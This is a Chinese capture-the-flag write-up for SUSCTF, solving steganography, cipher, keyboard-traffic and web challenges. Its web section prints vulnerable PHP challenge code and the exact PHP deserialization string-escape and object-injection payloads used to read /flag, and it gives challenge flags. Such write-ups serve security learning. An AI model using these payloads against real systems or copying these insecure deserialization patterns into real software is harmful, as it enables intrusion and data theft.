前言

得到号的时候只剩半天时间了,断断续续做了一些题,有些web题环境关了来不及复现,buu见

MISC

签到

SUSCTF{Welcome_t0_SUSCTF}

调查问卷

SUSCTF{Thank_y0u_fOr_your_r3ply}

爆破鬼才请求出战

第一关,掩码爆破

图片

图片

图片

图片

第二关,LSB隐写

图片

图片

第三关,栅栏密码

S{urgdt1}UY_30__sS0a_04mc

图片

图片

SUS{Y0u_ar3_g00d_4t_m1sc}

签到之公众号

SUSCTF{W3lc0m3_t0_SUSCTF}

Dance_Dance

第一关,跳舞的小人密码

图片

图片

根据在线网站对出字符,举旗子的代表一个单词的结尾

图片

图片

passwdLetU sdanCe

第二关,binwalk分离

图片

图片

压缩包密码:LetUsdanCe

第三关,音频频谱二维码

图片

图片

终究还是自己手画了出来

图片

图片

SUS{1nt3r35t1nG_5p3ctRum}

ƃɐlɟ¯ʇuᴉɹԀ

将十六进制数据倒序,得到一个zip

zip里有一个txt和加密压缩包,对txt进行字频分析

图片

图片

Mima:D0youkNOw3dpr1nt?

根据文件内容用到 Cura_SteamEngine 4.6.2 软件

是我没有的硬件,告辞

[萌]你还好吗?

在线网站解ook密码

图片

图片

Ar3_y0u_OK??

解压缩包得到图片,提示不够高,winhex改下高度

图片

图片

SUS{wuhu_y0u_f1nD_m3}

[萌]fix_fo

拖进winhex修复文件头

图片

图片

解压得到新佛曰密码

1
新佛曰:諸隸殿僧降殿吽殿諸陀摩隸僧缽薩殿願心殿薩殿咤伏殿聞莊摩咤殿諦殿如叻須降闍殿亦修我殿愍殿諸隸殿波如空殿如如囑囑殿
图片

图片

SUS{Ta1k_w1th_F0}

抓住那只小老鼠

第一关,zip伪加密,只有一个包是伪加密

图片

图片

解压得到keyboard流量包,粗略看了下是键盘敲击码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
00:00:13:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:12:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:33:00:00:00:00:00
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:22:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:21:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:05:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
00:00:00:00:00:00:00:00
图片

图片

passwordl3t-u5-l00k-4t-th3-r1ght-butt0n

解不开那个压缩包,麻了

emoji真好玩

根据文件名,是个jpg的jphs加密,密码在emoji里

1
💸😲📓📓📀📧📰😫🐖👹🐛😫😥🐍📬📧😃🐡

可以使用github上的脚本解密

图片

图片

password:C0de3moj1

使用密码对图片进行解密

图片

图片

得到一个01字符串,文件名说把它画出来,猜测是01字符串转二维码

根据开方为245*245的二维码,跑脚本得到二维码图片

图片

图片

SUS{1p0ch_wanNA_4_npy5}

小熊你咋带着品如的面具

看样子是要先取证iso再用获得的密码来用EncryptoforWin进行解密

CRYPTO

[简单]嘤语

1
2
3
4
5
6
7
8
9
10
11
小Z在某站监听到一段加密对话:
😳😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐🔑⬜🤣⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏⬜😳🤪⬜🤣⬜😋🤐😖😍⬜🤩😆⬜😇😳😖🥺😍😏⬜😋🥺🤣😋⬜😴🤣🤪⬜😘🤪😍🙃⬜🥺😳🤪😋🤩😏😳😇🤣😠😠🤐⬜😅😘😋⬜😊🤩😴⬜🥺🤣🤪⬜😆🤣😠😠😍😊🔑⬜😆🤩😏⬜😋🥺😍⬜😭🤩🤪😋⬜😖🤣😏😋🔑⬜😳😊😋🤩⬜🙃😳🤪😘🤪😍⭕⬜😳😊⬜😇🤩😊😋😏🤣🤪😋⬜😋🤩⬜😭🤩🙃😍😏😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺😳😇⬜🤣😠🧐🤩😏😳😋🥺😭🤪🔑⬜😭🤩🤪😋⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏🤪⬜😇🤣😊⬜😅😍⬜😖😏🤣😇😋😳😇🤣😠😠🤐⬜😇🤩😭😖😘😋😍🙃⬜🤣😊🙃⬜🤪🤩😠😮😍🙃⬜😅🤐⬜🥺🤣😊🙃⭕⬜🥺🤩😴😍😮😍😏🔑⬜😋🥺😍🤐⬜🤣😏😍⬜🤣😠🤪🤩⬜😘🤪😘🤣😠😠🤐⬜😮😍😏🤐⬜🤪😳😭😖😠😍⬜😋🤩⬜😅😏😍🤣😷⬜😴😳😋🥺⬜😭🤩🙃😍😏😊⬜😋😍😇🥺😊🤩😠🤩🧐🤐⭕⬜😋🥺😍⬜😋😍😏😭⬜😳😊😇😠😘🙃😍🤪⬜😋🥺😍⬜🤪😳😭😖😠😍⬜🤪🤐🤪😋😍😭🤪⬜😘🤪😍🙃⬜🤪😳😊😇😍⬜🧐😏😍😍😷⬜🤣😊🙃⬜😏🤩😭🤣😊⬜😋😳😭😍🤪🔑⬜😋🥺😍⬜😍😠🤣😅🤩😏🤣😋😍⬜😏😍😊🤣😳🤪🤪🤣😊😇😍⬜😇😳😖🥺😍😏🤪🔑⬜😴🤩😏😠🙃⬜😴🤣😏⬜😳😳⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐⬜🤪😘😇🥺⬜🤣🤪⬜😋🥺😍⬜😍😊😳🧐😭🤣⬜😭🤣😇🥺😳😊😍⬜🤣😊🙃⬜😅😍🤐🤩😊🙃⭕⬜🥺😍😏😍⬜😳🤪⬜🤐🤩😘😏⬜😆😠🤣🧐☯⬜🤪😘🤪😇😋😆🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒⭕
经过大量尝试,小Z勉强还原出一些特殊字符:
⭕ => .
☯ => :
🔑 => ,
⛔ => _
🌘 => {
🌒 => }
你能帮帮他吗?
注:flag均为大写

找到了编码表解密网站,但这题用不到
这题纯粹靠英语来猜,比如最后这一段应该是flag

1
2
3
4
🤪😘🤪😇😋😆
SUSCTF
🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒
SUSCTF{**S*_*****C*_C***T*}

又比如英语中比较常见的THE,IS等,根据已知的emoji和语句意进行猜测

1
2
3
4
5
6
7
8
9
10
11
12
😋🥺😍
THE
😳🤪
IS
😆😠🤣🧐☯
FLAG:
😋🥺😍🤐
THEY
😋🤐😖😍
TYPE
更新后的flag
SUSCTF{EASY_REPLACE_CRYPTE}

WEB

Sign_in

抓包改post传参

图片

图片

SUSCTF{397d79b4fd5bb85d73d86742dfdf223d}

AT_Field

修改可以输入的字符长度,输入flag并提交

图片

图片

SUSCTF{0e808712e2a814fe0cd126e09159226a}

Script_Kiddle

抓个包爆破,需要缘分

图片

图片

SUSCTF{24bf10b0f61c19e10a631e4c603127b2}

first_lesson

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
highlight_file(__FILE__);
if (isset($_GET["z33"]))
{
echo "<p>z33 is " . $_GET['z33'] . "</p>";
if ($_GET["z33"] === "feiwu")
{
if (isset($_GET["rmb"]))
{
echo "<p>rmb is " . $_GET["rmb"] . "</p>";
if ($_GET["rmb"] === "shenxian")
{
if (isset($_POST["aa"]))
{
echo "<p>aa is dage of " . $_POST["aa"] . "</p>";
if ($_POST["aa"] === "z33&rmb")
{
echo file_get_contents("/flag");
}
}
else
{
echo "<p>use POST method to submit aa</p>";
}
}
}
else
{
echo "<p>use GET method to submit rmb</p>";
}
}
}
else
{
echo "<p>use GET method to submit z33</p>";
}
图片

图片

SUSCTF{so_who_is_AA}

刀来!

图片

图片

SUSCTF{f5f397a37b728d927576ae889b908d17}

Ez_escape1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
highlight_file(__file__);
$name=$_POST["name"];
$number=10086;
class escape
{
public $name;
public $number;
public function __construct($name,$number)
{
$this->name=$name;
$this->number=$number;
}
}
function filter($string){
return str_replace('nzgnb','nzgyyds',$string);
}
$epoch=filter(serialize(new escape($name,$number)));
echo $epoch."<br>";
$ep0ch=unserialize($epoch);
if($ep0ch->number===1008611) {
echo base64_encode(file_get_contents("/flag"));
}
else{
echo "try again";
}

nzgnb被替换成nzgyyds逃逸2个字符,需要传入的数据长度是26,name传入13个nzgnb即可逃逸

1
2
{s:4:"name";s:91:"nzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyyds";s:6:"number";i:1008611;}";s:6:"number";i:10086;}
U1VTQ1RGe2MyYmQyOWRiNDk1N2JmODBjM2M5OWRlMTliZDRhNjBkfQ==

SUSCTF{c2bd29db4957bf80c3c99de19bd4a60d}

Ez_escape2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
highlight_file(__file__);
$haidilao=$_POST["haidilao"];
$core=$_POST["core"];
$num="2019";
class escape2
{
public $haidilao;
public $core;
public $num;
public function __construct($haidilao,$core,$num)
{
$this->haidilao=$haidilao;
$this->core=$core;
$this->num=$num;
}
public function __wakeup()
{
if($this->num==="2020") {
echo base64_encode(file_get_contents("/flag"));
}
else{
echo "try again";
}

}
}

function filter($string){
return str_replace('Haidilao','Hedilao',$string);
}
$btis=filter(serialize(new escape2($haidilao,$core,$num)));
echo "<br>".$btis."<br>";
$bt15=unserialize($btis);

根据过滤后字符串减少的原理,使core传入构造代码

1
2
3
O:7:"escape2":3:{s:8:"haidilao";s:8:"Hedilao";s:4:"core";s:1:"1";s:3:"num";s:4:"2019";} #正常的序列化字符串
";s:4:"core";s:1:" # 需要吃掉的字符
";s:4:"core";s:1:"1";s:3:"num";s:4:"2020";} # 需要传输的core的值

截止到core的值共19个字符,即传入19个Haidilao,替换成Hedilao后吞掉19个字符,使后面的payload补上

1
2
haidilao=HaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilao
HaidilaoHaidilaoHaidilaoHaidilao&core=";s:4:"core";s:3:"123";s:3:"num";s:4:"2020";}

AA_is_who

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
highlight_file(__FILE__);
class AA
{
public $name;
protected $power;
public function __destruct()
{
if($this->name === "Aryb1n")
{
echo "AA is Aryb1n";
if($this->power > 100000)
{
echo "AA is powerful";
echo file_get_contents("/flag");
}
else
{
echo "AA is not so weak";
}
}
else
{
echo "who is AA?";
}
}
}
// maybe you should consider URL encode?
$aa = $_GET["aa"];
unserialize($aa);

get接受aa变量的传参,要求$power的值大于100000,$name的值为Aryb1n,使代码序列化
$power类型为protected,需要使用%00进行填充补全,也可以将序列化串进行url编码

1
2
3
4
5
6
7
8
9
10
11
<?php
class AA{
    public $name=Aryb1n;
    protected $power=1000000;
}
$a=new AA();
print serialize($a);
print urlencode(serialize($a));
?>
//O:2:"AA":2:{s:4:"name";s:6:"Aryb1n";s:8:"*power";i:1000000;}
//O%3A2%3A%22AA%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A6%3A%22Aryb1n%22%3Bs%3A8%3A%22%00%2A%00power%22%3Bi%3A1000000%3B%7D
图片

图片